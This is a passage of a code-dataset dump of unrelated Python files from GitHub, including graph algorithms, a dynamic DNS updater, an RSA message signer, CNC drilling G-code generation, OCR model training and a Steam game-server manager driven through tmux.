sc_job_pixel.set_pixel_geometry(thti, phii)\n red, imd = sc_job_pixel.alm2map_spin(dclm, 1)[:,0:1]\n thtn, phin= d2ang(red, imd, thti, phii, version)\n re_res, im_res = ang2d(thtn, thts, phin - phis) # residual deflection field\n maxres = np.max(np.sqrt(re_res * re_res + im_res * im_res))\n redi = redi - re_res\n imdi = imdi - im_res\n print(maxres / np.pi * 180 * 60, sc_job_pixel.geom.theta, Geom.phis(sc_job_pixel.geom, 0))\n print(itr, ITRMAX, maxres / np.pi * 180 * 60)\n return redi, imdi\nif __name__ == '__main__':\n\n d._bwd_angles()\n\n\n","repo_name":"NextGenCMB/delensalot","sub_path":"tests/old/test_inverse.py","file_name":"test_inverse.py","file_ext":"py","file_size_in_byte":5227,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"72"} +{"seq_id":"34778732060","text":"from copy import deepcopy\n\ndef DFS(tree,vertex=\"A\"):\n \"\"\"\n This method provides a recursive DFS traversal of the tree\n parameter passed in. It maintains a list of each parent and\n child vertice which is returned to each parent via the\n recursive call.\n\n Parameters:\n --------------\n tree : dictionary\n The tree parameter is a dictionary with each key having a\n value of its child vertices associated with it\n vertex : string\n The vertex parameter hold the current parent relative to\n the recursive call. 
It is \"A\" by default as that is the\n specified starting point per Prof Santana\n\n Returns:\n --------------\n list\n A list of strings representing each vertex in DFS order.\n \"\"\"\n dfs_list = []\n\n #if vertex has not been visited\n if vertex not in dfs_list:\n dfs_list += vertex\n\n #for each child of the vertex\n for child in tree[vertex]:\n dfs_list += DFS(tree,child)\n\n return dfs_list\n\ndef BFS(tree,level=[\"A\"]):\n \"\"\"\n This method provides a BFS traversal of the tree parameter\n passed in. It maintains a list of strings representative of\n each vertex in the tree. For each \"level\" of the tree it makes\n a recursive call passing in each vertex contained within the\n \"sub-level\", (or a list of all of the children of each vertex\n in \"level\").\n\n Parameters:\n --------------\n tree : dictionary\n The tree parameter is a dictionary with each key having a\n value of its child vertices associated with it\n level : list\n The level parameter is a list of strings representative of\n each vertex in a specific \"level\" of the tree\n\n Returns:\n --------------\n list\n A list of strings representative of the each vertex of the\n tree traversed in BFS order\n \"\"\"\n\n bfs_list = []\n\n if len(level) > 0:\n bfs_list += level\n sub_level = []\n for vertex in level:\n sub_level += tree[vertex]\n bfs_list += BFS(tree,sub_level)\n return bfs_list\n\n#from isomorphisms\ndef is_same(list1, list2):\n is_same = True\n\n if len(list1) == len(list2):\n for item in list1:\n if item not in list2:\n is_same = False\n else:\n is_same = False\n return is_same\n\ndef edge_get(graph):\n \"\"\"\n This method returns a list of lists representative of vertex pairs\n (strings) in non-decreasing order. For each key in the dictionary,\n every value is evaluated. If the pair (key,value) already appears\n in edge_list it is ignored, if not it is inserted by comparing it's\n edge weight with the others contained in the list via weights[].\n\n Parameters:\n --------------\n graph : dictionary\n A dictionary with a list of lists that contain a vertex\n (string) and a edge weight (int)\n\n Returns:\n --------------\n list\n A list of strings representative of the each vertex of the\n tree traversed in BFS order\n \"\"\"\n edge_list = []\n weights = []\n\n for node in graph:\n for adj_edge in graph[node]:\n #the current edge\n curr_edge = [node, adj_edge[0]]\n #edge_list empty, ie first iteration\n if len(edge_list) < 1:\n edge_list.append(curr_edge)\n weights.append(adj_edge[1])\n else:\n in_list = False\n #check edge_list for curr_edge's existance\n for i in edge_list:\n if is_same(i,curr_edge):\n in_list = True\n break\n if not in_list:\n #sort edge_list while building\n for i in range(len(edge_list)):\n if weights[i] >= adj_edge[1]:\n edge_list.insert(i,curr_edge)\n weights.insert(i,adj_edge[1])\n break\n if i == len(edge_list)-1:\n edge_list.append(curr_edge)\n weights.append(adj_edge[1])\n return edge_list\n\ndef is_cycle(temp_graph, original, current, prev, visited):\n \"\"\"\n A recursive solution to identifying cycles where a temporary\n graph is passed in, a starting point, the current vertex being\n examined, the previous vertex examined, and a list of vertexes\n on the current path. 
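DFS() and BFS() above take the tree as a dict mapping each vertex to its list of children; note that dfs_list is local to each recursive call, so the membership guard never actually fires and the code relies on the input being a tree. A small invented example:

#        A
#       / \
#      B   C
#     / \   \
#    D   E   F
tree = {"A": ["B", "C"], "B": ["D", "E"], "C": ["F"],
        "D": [], "E": [], "F": []}

print(DFS(tree))   # ['A', 'B', 'D', 'E', 'C', 'F']
print(BFS(tree))   # ['A', 'B', 'C', 'D', 'E', 'F']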
At each recursive iteration it checks to\n make sure that the current vertex is not being mapped back onto\n the original.\n\n Parameters:\n --------------\n temp_graph : dictionary\n original : string\n current : string\n prev : string\n visited : string\n\n Returns:\n --------------\n list\n \"\"\"\n\n result = False\n\n if len(temp_graph[current]) == 1:\n result = False\n else:\n visited.append(current)\n for x in temp_graph[current]:\n if x == original and x != prev:\n result = True\n else:\n if x not in visited:\n result = is_cycle(temp_graph, original, x, current, visited)\n if result is True:\n break\n return result\n\ndef min_kruskal(graph):\n \"\"\"\n The method works by getting a list of all edges in graph\n in non-decreasing order, creating 2 temporary dictionaries, and\n a list to return. On each iteration an edge gets added to\n temp_graph2, it is then passed to is_cycle to see if there is\n a cycle that exists. If there is a cycle that exists the edge\n is removed, if not it is added to temp_graph. The resulting\n list of edges is returned.\n\n Parameters:\n --------------\n graph : dictionary\n\n\n Returns:\n --------------\n list\n\n \"\"\"\n\n kruskal_mst = []\n temp_graph = {}\n temp_graph2 = {}\n\n #init temp dicts with key values\n for g in graph:\n temp_graph[g] = []\n temp_graph2[g] = []\n #get edges in graph\n kruskal_g = edge_get(graph)\n\n for edge in kruskal_g:\n temp_graph2[edge[0]] += edge[1]\n temp_graph2[edge[1]] += edge[0]\n if is_cycle(temp_graph2,edge[0],edge[0],edge[0],[]) == False:\n temp_graph = deepcopy(temp_graph2)\n kruskal_mst.append(edge)\n else:\n temp_graph2 = deepcopy(temp_graph)\n return kruskal_mst\n\n\ndef min_prim(graph):\n \"\"\"\n Due to the length of this method, please refer to inline\n comments.\n\n Parameters:\n --------------\n graph : dictionary\n\n Returns:\n --------------\n list\n\n \"\"\"\n\n prims_g= edge_get(graph)\n mst = []\n temp_graph = {}\n temp_graph2 = {}\n # initialize temps to hold empty lists []\n for g in graph:\n temp_graph[g] = []\n temp_graph2[g] = []\n # add the first edge to the mst and temp graphs\n mst.append(prims_g[0])\n temp_graph2[prims_g[0][0]] += prims_g[0][1]\n temp_graph2[prims_g[0][1]] += prims_g[0][0]\n temp_graph = deepcopy(temp_graph2)\n # remove first edge from edgelist\n prims_g.pop(0)\n # delete edges in prims_g if added to mst until either there is nothing left or\n # the only edges we can add create cycles\n while(len(mst) < len(graph.keys())-1):\n check = False\n # loop through the edges to find the next one to add\n for edge in prims_g:\n # loop through mst to see if the current edge to add contains a vertex currently in the mst\n for x in mst:\n # if there is an edge that has a vertex part of the current mst add it to the temp and make sure it doesnt create a cycle\n if edge[0] in x or edge[1] in x:\n temp_graph2[edge[0]] += edge[1]\n temp_graph2[edge[1]] += edge[0]\n # if no cycle is made, commit it to the other temp and add that edge to mst and remove it from the edgelist\n if is_cycle(temp_graph2, edge[0], edge[0], edge[0], []) == False:\n temp_graph = deepcopy(temp_graph2)\n mst.append(edge)\n prims_g.remove(edge)\n check = True\n break\n # if it does make a cycle, undo that edge\n else:\n check = False\n temp_graph2 = deepcopy(temp_graph)\n if check == True:\n break\n return 
mst\n","repo_name":"warnickb/MTH325","sub_path":"Project/trees.py","file_name":"trees.py","file_ext":"py","file_size_in_byte":8712,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"43105511386","text":"from django.conf import settings\n\n\ndef show_debug_toolbar(request):\n \"\"\"Shows the debug toolbar based on the debug arg in the URL.\n\n ?debug=on - turns debugging on in the current session\n ?debug=off - turns debugging off in the current session\n\n Based on http://djangosnippets.org/snippets/2574/, but allowing staff to\n use it in production.\n \"\"\"\n if settings.DEBUG or request.user.is_staff:\n debug = request.GET.get(\"debug\", None)\n if debug == \"on\":\n request.session[\"debug\"] = True\n elif debug == \"off\" and \"debug\" in request.session:\n del request.session[\"debug\"]\n return \"debug\" in request.session\n return False\n","repo_name":"outreachy/website","sub_path":"outreachyhome/debug.py","file_name":"debug.py","file_ext":"py","file_size_in_byte":690,"program_lang":"python","lang":"en","doc_type":"code","stars":218,"dataset":"github-code","pt":"72"} +{"seq_id":"6604481746","text":"# coding=utf-8\n# @FileName: test-mutiprcs.py\n# @Author: ZhengQiang\n# Date: 2020/2/18 1:55 下午\nimport time\nimport multiprocessing\n\n\ndef f1(i):\n print('muti_a')\n time.sleep(i)\n\n\ndef f2(i):\n print('muti_b')\n time.sleep(i)\n\n\nif __name__ == '__main__':\n a = multiprocessing.Process(target=f1, args=(10,), name='asd')\n b = multiprocessing.Process(target=f2, args=(15,), name='ppp')\n a.start()\n b.start()\n s = multiprocessing.Semaphore(2)\n print(s)\n print(\"The number of CPU is:\" + str(multiprocessing.cpu_count()))\n for p in multiprocessing.active_children():\n print(\"child p.name:\" + p.name + \"\\tp.id\" + str(p.pid))\n\n","repo_name":"zq0324/zq","sub_path":"com/test-mutiprcs.py","file_name":"test-mutiprcs.py","file_ext":"py","file_size_in_byte":660,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"33244947858","text":"\"\"\"\n Simple script to update a DDNS record\n\n\"\"\"\nimport asyncio\nimport sys\n\nfrom dnsaio import protocol as dns_protocol\n\nimport dns.update\nimport dns.query\nimport dns.tsigkeyring\n\n\n@asyncio.coroutine\ndef query(transport, protocol):\n keyring = dns.tsigkeyring.from_text({\n 'key' : 'secret=='\n })\n\n zone = 'zone.example.com'\n host = sys.argv[1]\n address = sys.argv[2]\n update = dns.update.Update(zone, keyring=keyring)\n update.replace(host, 300, 'AAAA', address)\n\n return (yield from protocol.query(update))\n\ndef main():\n loop = asyncio.get_event_loop()\n\n transport, protocol = loop.run_until_complete(\n loop.create_connection(\n dns_protocol.DnsProtocol,\n host='localhost',\n port=53,\n )\n )\n\n data = loop.run_until_complete(query(transport, protocol))\n\nif __name__ == '__main__':\n main()\n","repo_name":"kingxsp/dnsaio","sub_path":"examples/dynamic_dns.py","file_name":"dynamic_dns.py","file_ext":"py","file_size_in_byte":880,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"23389223727","text":"from __future__ import print_function\nimport os\nfrom py2gcode import gcode_cmd\nfrom py2gcode import cnc_drill\nfrom params import params\n\nsafeZ = 0.15\nstepZ = 0.02\nstartZ = 0.0\nstopZ = -(params['plate']['thickness'] + 0.12) \nfeedrate = 2.5\nstartDwell = 2.0\n\nprog = 
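edge_get(), min_kruskal() and min_prim() above expect an adjacency dict where graph[v] is a list of [neighbour, weight] pairs recorded from both endpoints. A small invented graph for trying them:

graph = {
    "A": [["B", 1], ["C", 4]],
    "B": [["A", 1], ["C", 2], ["D", 5]],
    "C": [["A", 4], ["B", 2], ["D", 3]],
    "D": [["B", 5], ["C", 3]],
}

print(min_kruskal(graph))   # [['A', 'B'], ['B', 'C'], ['C', 'D']]
print(min_prim(graph))      # the same spanning tree; edge order may differ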
gcode_cmd.GCodeProg()\nprog.add(gcode_cmd.GenericStart())\nprog.add(gcode_cmd.Space())\nprog.add(gcode_cmd.FeedRate(feedrate))\n\n# Part mount holes 10-32 tap holes\npartHoleDict = params['partMountHoles']\nfor partXPos in params['plate']['xPosArray']:\n for i in (-1,1):\n xPos = partXPos + i*0.5*partHoleDict['holeSpacing']\n yPos = partHoleDict['yMidPos'] + i*0.5*partHoleDict['holeSpacing'] \n drillDict = { \n 'centerX' : xPos,\n 'centerY' : yPos,\n 'startZ' : startZ,\n 'stopZ' : stopZ,\n 'safeZ' : safeZ,\n 'stepZ' : stepZ,\n 'startDwell' : startDwell,\n }\n drill = cnc_drill.PeckDrill(drillDict)\n prog.add(drill)\n prog.add(gcode_cmd.Space())\n\nprog.add(gcode_cmd.Space())\nprog.add(gcode_cmd.End(),comment=True)\nprint(prog)\nbaseName, dummy = os.path.splitext(__file__)\nfileName = '{0}.ngc'.format(baseName)\nprint(fileName)\nprog.write(fileName)\n","repo_name":"iorodeo/stir_plate_mechanics","sub_path":"cnc/motor_hub/drill_fixture/plate/drill_10_32_tap.py","file_name":"drill_10_32_tap.py","file_ext":"py","file_size_in_byte":1286,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"72"} +{"seq_id":"70840496553","text":"import os\nimport sys\nfrom sacred import Experiment\n\nex_images = Experiment()\n\n\n@ex_images.config\ndef default_config():\n batch_size = 32\n epochs = 80\n memory_units = 512\n pool_size = 2\n\n charset = 67 # a-zA-Z0-9,.- /\n line_width_padded = 535\n line_height_normalized = 64\n max_string_length = 7\n\n force_new = True\n\n training_samples = None\n\n\n@ex_images.main\ndef run(training_samples, batch_size, epochs, memory_units, pool_size, charset, line_width_padded, line_height_normalized,\n max_string_length, force_new):\n from src.handwritten_text_recognition.ocr.train.classifier_controller import Classifier\n from src.handwritten_text_recognition.ocr.train.data_generator import DataGenerator\n from src.handwritten_text_recognition.ocr.train.visualization_callback import VisualizationCallback\n from src.handwritten_text_recognition.config import get_path_to_model_dir_in_assets\n\n classifier = Classifier()\n\n image_paths = None\n image_labels = None\n\n if training_samples is None:\n image_paths, image_labels = classifier.load_dataset(Classifier.DATASET_TYP['cvl'])\n else:\n image_paths, image_labels = classifier.load_dataset(training_samples)\n\n generator = DataGenerator(downsample_factor=(pool_size ** 2),\n line_width_padded=line_width_padded,\n line_height_normalized=line_height_normalized, max_string_length=max_string_length)\n generator.setup_training(image_paths=image_paths, image_labels=image_labels, batch_size=batch_size)\n\n model = classifier.define_model(charset=charset,\n line_height_normalized=line_height_normalized,\n memory_units=memory_units, pool_size=pool_size,\n line_width_padded=line_width_padded, max_string_length=max_string_length)\n\n if force_new is False:\n rnn_model = model.get_model()\n rnn_model.load_weights(get_path_to_model_dir_in_assets('cvl-80epochs.h5'))\n\n test_function = model.get_test_function()\n visualization_callback = VisualizationCallback(test_function, generator.generate_validation())\n\n classifier.train(generator, epochs, callbacks=[generator, visualization_callback], visualize=True)\n\n\nif __name__ == '__main__':\n head, tail = os.path.split(os.path.join(os.path.abspath(__file__)))\n PACKAGE_DIR = os.path.join(head, '..{}..{}'.format(os.sep, os.sep))\n\n sys.path.insert(0, PACKAGE_DIR)\n\n 
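train.py above follows sacred's configuration-injection pattern: names assigned in the @ex.config function become the experiment config and are injected into @ex.main by parameter name, and run_commandline() lets CLI overrides of the form `with epochs=5` replace them. A minimal sketch; the experiment and parameter names are invented.

from sacred import Experiment

ex = Experiment()

@ex.config
def default_config():
    batch_size = 32      # captured into the experiment's config
    epochs = 80

@ex.main
def run(batch_size, epochs):
    print(f"training for {epochs} epochs, batch size {batch_size}")

if __name__ == "__main__":
    ex.run_commandline()   # e.g. `python demo.py with epochs=5`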
ex_images.run_commandline()\n","repo_name":"CrazyCrud/ocr-with-keras","sub_path":"src/handwritten_text_recognition/train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":2538,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"22800842804","text":"import queue\n\nclass sorting:\n def __init__(self, x1, x2):\n self.x1 = x1\n self.x2 = x2\n def __lt__(self, other):\n return self.x1 < other.x1\n\nn = int(input())\npoints = []\nfor _ in range(n):\n x, y = map(float, input().split())\n points.append((x,y))\n\n \ncount_array = [0] * n\n\npq = queue.PriorityQueue()\nfor sort_queue in points:\n pq.put(sorting(sort_queue[0], sort_queue[1]))\n\nresults = []\nwhile not pq.empty():\n imp = pq.get()\n results.append(imp.x2)\n \ncount = 0\nfor i in range(len(results)):\n for j in range(i+1):\n if results[i] > results[j]:\n if results[i] > results[j]:\n count += 1\n count_array[i] = count\n count = 0\n\n\nfor _ in range(len(count_array)):\n print(count_array[_])\n \n \n \n \n \n \n","repo_name":"LiamChiang/Algorithms-and-Complexity","sub_path":"Assignment/Assignment2/q2b.py","file_name":"q2b.py","file_ext":"py","file_size_in_byte":799,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"3303555851","text":"import argparse\nimport select\nimport socket\nimport sys\nfrom Crypto.PublicKey import RSA\nfrom Crypto.Signature import pkcs1_15\nfrom Crypto.Hash import SHA256\nimport binascii\n\n\ndef client_init(hostname, msg):\n\n\tpadded_len = '0' * (4-len(str(len(msg)))) + str(len(msg))\n\n\tkey = RSA.import_key(open('myRSAkey.pem').read())\n\n\th = SHA256.new(str.encode(msg))\n\tsignature_hex = binascii.hexlify(pkcs1_15.new(key).sign(h))\n\n\tsignature_len = '0' * (4-len(str(len(signature_hex)))) + str(len(signature_hex))\n\n\tsigned_message = padded_len + msg + signature_len + signature_hex.decode('utf8')\n\n\twith socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:\n\t\ts.connect((hostname, 9998))\n\n\t\ts.send(signed_message.encode('utf8'))\n\n\t\treturn\n\n\ndef genkey():\n\tkey = RSA.generate(4096)\n\tf_pub = open(\"mypubkey.pem\", \"wb\")\n\tf_pub.write(key.publickey().export_key())\n\tf_pub.close()\n\n\tf_private = open(\"myRSAkey.pem\", \"wb\")\n\tf_private.write(key.export_key('PEM'))\n\tf_private.close()\n\n\treturn\n\t\n\n\nif (len(sys.argv) < 2):\n\tprint('Usage: signer.py --genkey | --c hostname --m message')\n\nelif (sys.argv[1] == '--genkey'): \n\tif (len(sys.argv) != 2): print('Usage: signer.py --genkey | --c hostname --m message')\n\telse: \n\t\tgenkey()\n\nelif (sys.argv[1] == '--c'):\n\tif (len(sys.argv) <= 2): print('Usage: signer.py --genkey | --c hostname --m message')\n\telse: \n\t\tclient_init(sys.argv[2], sys.argv[4])\n\nelse: print('Usage: signer.py --genkey | --c hostname --m message')","repo_name":"sleptcodes/Network-Security-Applications","sub_path":"signer.py","file_name":"signer.py","file_ext":"py","file_size_in_byte":1437,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"18749573598","text":"import os\nimport platform as pf\nimport shutil\nimport subprocess\nimport tarfile\nfrom datetime import datetime\nfrom pathlib import Path\nfrom urllib.request import urlretrieve\nfrom zipfile import ZipFile\n\nimport libtmux\nimport vdf\nimport yaml\n\nfrom .config import Config\n\n\nclass App():\n def __init__(self, app, app_dir, backup_dir=None, platform=None):\n self.app_id, self.app_name, 
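signer.py above produces a pkcs1_15/SHA-256 signature but never checks one; the receiving side would verify against the public key that genkey() writes to mypubkey.pem. A sketch using the same pycryptodome primitives:

import binascii
from Crypto.PublicKey import RSA
from Crypto.Signature import pkcs1_15
from Crypto.Hash import SHA256

def verify(msg, signature_hex, pubkey_path="mypubkey.pem"):
    key = RSA.import_key(open(pubkey_path).read())
    h = SHA256.new(msg.encode())
    try:
        # verify() raises on mismatch rather than returning a flag
        pkcs1_15.new(key).verify(h, binascii.unhexlify(signature_hex))
        return True
    except (ValueError, TypeError):
        return False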
self.server_name = Index.search(app)\n\n # app_id is required, if None raise FileNotFoundError\n f = f'{self.app_id}.yaml'\n self.config_f = Path(Config.data_dir, 'apps', f)\n self.config_is_default = True\n\n # check for user app config file\n d = Path(Config.config_dir, 'apps')\n if d.exists() and Path(d, f).is_file():\n self.config_f = Path(d, f)\n self.config_is_default = False\n\n with open(self.config_f, 'r') as f:\n data = yaml.safe_load(f)\n\n self.app_names = list(data['apps'].keys())\n if not self.app_name:\n self.app_name = self.app_names[0]\n\n self.server_names = list(data['apps'][self.app_name]['servers'].keys())\n\n data = data['apps'][self.app_name]\n self.full_name = data['fname']\n\n if self.server_name:\n self.start_options = data['servers'][self.server_name]['start']\n self.stop_options = data['servers'][self.server_name]['stop']\n\n self.app_dir = Path(app_dir, str(self.app_id), self.app_name)\n if backup_dir:\n self.backup_dir = Path(backup_dir, str(self.app_id), self.app_name)\n\n self.beta, self.beta_password, self.app_config = None, None, None\n for key in data.keys():\n if key == 'beta':\n self.beta = data['beta']\n elif key == 'password':\n self.beta_password = data['password']\n elif key == 'app_config':\n self.app_config = data['app_config']\n\n if not platform:\n self.platform = pf.system()\n else:\n self.platform = platform\n\n self.platforms = data['platforms'].keys()\n self.arch = pf.architecture()[0]\n\n if self.platform in self.platforms:\n if 'exec' in data['platforms'][self.platform].keys():\n data = data['platforms'][self.platform]\n else:\n data = data['platforms'][self.platform][self.arch]\n\n self.exe = data['exec']\n self.exec_dir = self.app_dir\n self.library = None\n\n for key in data.keys():\n if key == 'directory':\n self.exec_dir = Path(self.app_dir, data['directory'])\n elif key == 'library':\n self.library = data['library']\n\n @property\n def build_id_local(self):\n '''Return the app's local build id'''\n f = Path(self.app_dir, 'steamapps', f'appmanifest_{self.app_id}.acf')\n\n if f.is_file():\n with open(f, 'r') as app_manifest:\n data = vdf.load(app_manifest)\n return int(data['AppState']['buildid'])\n return 0\n\n @property\n def build_id_steam(self):\n '''Return the app's steam build id'''\n steamcmd = SteamCMD()\n data = steamcmd.info(self.app_id)\n\n if data:\n if self.beta:\n return int(data['depots']['branches'][self.beta]['buildid'])\n return int(data['depots']['branches']['public']['buildid'])\n return 0\n\n @property\n def installed(self):\n '''Return True if app is installed'''\n if self.app_dir.exists():\n for d in self.app_dir.iterdir():\n # if only steamapps directory is found\n # then it did not completely install\n if d != 'steamapps':\n return True\n return False\n\n @property\n def running(self):\n '''Return True if app is running'''\n # Server functions do not work on Windows\n if self.platform != 'Windows':\n return Server.running_check(self.app_name)\n return False\n\n def backup(self, compression=None):\n '''Backup app to backup_dir using tar'''\n if not compression:\n compression = ''\n extension = '.tar'\n else:\n extension = f'.tar.{compression}'\n\n date = datetime.now().strftime(\"%Y-%m-%d-%H%M%S\")\n f = Path(self.backup_dir, f'{date}{extension}')\n\n with tarfile.open(f, f'w:{compression}') as tar:\n os.chdir(self.app_dir.parent)\n tar.add(self.app_name)\n\n def copy_config(self):\n '''Copy default app config file to config_dir'''\n f = f'{self.app_id}.yaml'\n shutil.copyfile(Path(Config.data_dir, 'apps', f),\n 
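App.backup() above names each archive with a timestamp and lets tarfile pick the compressor from the mode string ("w:" is plain tar; "w:gz", "w:bz2" and "w:xz" compress). The same logic as a standalone function, with invented paths:

import os
import tarfile
from datetime import datetime
from pathlib import Path

def backup(app_dir, backup_dir, compression="gz"):
    ext = f".tar.{compression}" if compression else ".tar"
    stamp = datetime.now().strftime("%Y-%m-%d-%H%M%S")
    target = Path(backup_dir, f"{stamp}{ext}")
    app_dir = Path(app_dir)
    with tarfile.open(target, f"w:{compression or ''}") as tar:
        os.chdir(app_dir.parent)   # archive relative paths, as backup() does
        tar.add(app_dir.name)      # the app folder becomes the archive root
    return target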
Path(Config.config_dir, 'apps', f))\n self.config_is_default = False\n\n def remove(self):\n '''Remove app directory'''\n shutil.rmtree(self.app_dir)\n\n # if this app is the only one installed for that app_id\n # remove the now empty app_id directory as well\n app_dir = self.app_dir.parent\n if not os.listdir(app_dir):\n app_dir.rmdir()\n\n def restore(self, backup):\n '''Restore specified backup file'''\n with tarfile.open(Path(self.backup_dir, backup)) as tar:\n def is_within_directory(directory, target):\n abs_directory = os.path.abspath(directory)\n abs_target = os.path.abspath(target)\n prefix = os.path.commonprefix([abs_directory, abs_target])\n return prefix == abs_directory\n\n def safe_extract(tar, path=\".\", members=None, *, numeric_owner=False):\n for member in tar.getmembers():\n member_path = os.path.join(path, member.name)\n if not is_within_directory(path, member_path):\n raise Exception(\"Attempted Path Traversal in Tar File\")\n tar.extractall(path, members, numeric_owner=numeric_owner) \n\n safe_extract(tar, self.app_dir.parent)\n\n if self.config_is_default:\n self.copy_config()\n\n def update(self, username='anonymous', password='',\n steam_guard='', validate=False):\n '''Update app using steamcmd'''\n if self.config_is_default:\n self.copy_config()\n\n steamcmd = SteamCMD()\n return steamcmd.app_update(self.app_id, self.app_dir,\n self.beta, self.beta_password,\n self.app_config, self.platform,\n validate, username, password,\n steam_guard)\n\n\nclass Index():\n '''Used for working with app_index.yaml'''\n f = Path(Config.config_dir, 'app_index.yaml')\n\n @staticmethod\n def config_dirs():\n '''Get app config dirs'''\n for d in Config.data_dir, Config.config_dir:\n d = Path(d, 'apps')\n if d.exists():\n yield d\n\n @staticmethod\n def list(directory):\n '''Return appid or app_name if not only app for app_id'''\n directory = Path(directory)\n if not directory.exists():\n return\n\n with open(Index.f, 'r') as f:\n data = yaml.safe_load(f)\n\n for app_id in directory.iterdir():\n if len(data[int(app_id.name)].keys()) > 1:\n for app_name in Path(directory, app_id).iterdir():\n yield app_name.name\n else:\n yield app_id.name\n\n @staticmethod\n def list_all():\n '''Return generator of all app_id's in index'''\n with open(Index.f, 'r') as f:\n data = yaml.safe_load(f)\n\n for app_id in data.keys():\n app_names = data[app_id].keys()\n\n if len(app_names) > 1:\n for app_name in app_names:\n yield app_name\n else:\n yield app_id\n\n @staticmethod\n def search(app):\n '''Search index for app and return app_id, app_name, and server_name'''\n try:\n app = int(app)\n except ValueError:\n pass\n\n with open(Index.f, 'r') as f:\n data = yaml.safe_load(f)\n\n if app in data.keys():\n return app, None, None\n\n for app_id in data.keys():\n if app in data[app_id].keys():\n if app in data[app_id][app]:\n return app_id, app, app\n return app_id, app, None\n for app_name in data[app_id].keys():\n if app in data[app_id][app_name]:\n return app_id, app_name, app\n return None, None, None\n\n @staticmethod\n def update():\n '''Update index with latst app config files'''\n app_index = {}\n for d in Index.config_dirs():\n for f in d.iterdir():\n if Path(f).suffix == '.yaml':\n with open(Path(d, f), 'r') as config_f:\n data = yaml.safe_load(config_f)\n\n for app in data['apps'].keys():\n app_index[data['app_id']] = {app: list(data['apps'][app]\n ['servers'].keys())}\n\n with open(Index.f, 'w') as f:\n yaml.dump(app_index, f)\n\n\nclass Server(App):\n def __init__(self, app, app_dir, 
backup_dir=None, platform=None):\n super(Server, self).__init__(app, app_dir, backup_dir, platform)\n if not self.server_name:\n self.server_name = self.server_names[0]\n\n self.tmux = libtmux.Server()\n self.session_name = f'{self.app_name}-{self.server_name}'\n\n try:\n self.session = self.tmux.sessions.filter(session_name=self.session_name)[0]\n except IndexError:\n self.session = None\n\n @property\n def running(self):\n '''Return True if app is running'''\n if self.server_name == self.app_name:\n return Server.running_check(self.app_name)\n return Server.running_check(self.app_name, self.server_name)\n\n def console(self):\n '''Attach to tmux session'''\n self.session.attach_session()\n\n def kill(self):\n '''Kill tmux session'''\n self.session.kill_session()\n\n @staticmethod\n def running_check(app_name, server_name=None):\n '''Check if server or app is running'''\n tmux = libtmux.Server()\n\n if server_name:\n try:\n session = tmux.sessions.filter(f'{app_name}-{server_name}')[0]\n if session:\n return True\n return False\n except IndexError:\n return False\n else:\n for session in tmux.sessions:\n if session.name.startswith(f'{app_name}-'):\n return True\n return False\n\n def send(self, command):\n '''Send command to tmux session'''\n pane = self.session.windows[0].panes[0]\n # suppress_history and literal must be false for c-c to work\n pane.send_keys(command, enter=True, suppress_history=False, literal=False)\n\n def start(self, debug=False):\n '''Start server'''\n if self.library:\n cmd = f'LD_LIBRARY_PATH={self.library} {self.exe} '\n else:\n cmd = f'{self.exe} '\n\n # unreal engine games have options that end with a ?\n # they have to be combined into 1 long string with no spaces\n if self.start_options and self.start_options[0].endswith('?'):\n cmd += ''.join(self.start_options)\n else:\n cmd += ' '.join(self.start_options)\n\n if debug:\n # tmux session stays open even if server exits\n self.session = self.tmux.new_session(session_name=self.session_name,\n start_directory=self.exec_dir)\n self.send(cmd)\n else:\n self.session = self.tmux.new_session(session_name=self.session_name,\n start_directory=self.exec_dir,\n window_command=cmd)\n\n def stop(self):\n '''Stop server'''\n if self.stop_options:\n for command in self.stop_options:\n self.send(command)\n else:\n # Send Ctrl - C to tmux session to stop server\n self.send('c-c')\n\n\nclass SteamCMD():\n def __init__(self):\n if shutil.which('steamcmd'):\n self.exe = 'steamcmd'\n else:\n if pf.system() != 'Windows':\n self.directory = Path('~/.local/share/scsm/steamcmd').expanduser()\n self.exe = Path(self.directory, 'steamcmd.sh')\n else:\n self.directory = Path(os.getenv('APPDATA'), 'scsm', 'steamcmd')\n self.exe = Path(self.directory, 'steamcmd.exe')\n\n @property\n def installed(self):\n '''Return True if installed'''\n if self.exe == 'steamcmd':\n return True\n return self.directory.exists() and self.exe.is_file()\n\n def app_update(self, app_id, app_dir, beta=None, beta_password=None,\n config=None, platform=None, validate=False,\n username='anonymous', password='', steam_guard='',):\n '''+app_update wrapper'''\n cmd = ['+force_install_dir', app_dir, '+login', username, password,\n steam_guard, '+app_update', str(app_id), '+quit']\n\n if config:\n cmd.insert(-3, f'+app_set_config {app_id} {config}')\n if beta:\n cmd.insert(-1, f'-beta {beta}')\n if beta_password:\n cmd.insert(-1, f'-betapassword {beta_password}')\n if validate:\n cmd.insert(-1, 'validate')\n\n if platform and platform != pf.system():\n if platform == 
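The Server class above drives each game server inside a tmux session via libtmux: create a named session running the command, grab the first pane to send console input, and kill the session to stop. The core calls reduced to a sketch; the session name and command are invented placeholders, and a tmux installation is assumed.

import libtmux

tmux = libtmux.Server()
session = tmux.new_session(session_name="demo-server",
                           start_directory="/tmp",
                           window_command="python3 -i")
pane = session.windows[0].panes[0]
pane.send_keys("print('hello from tmux')", enter=True)
# ... later, to stop it:
# session.kill_session()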
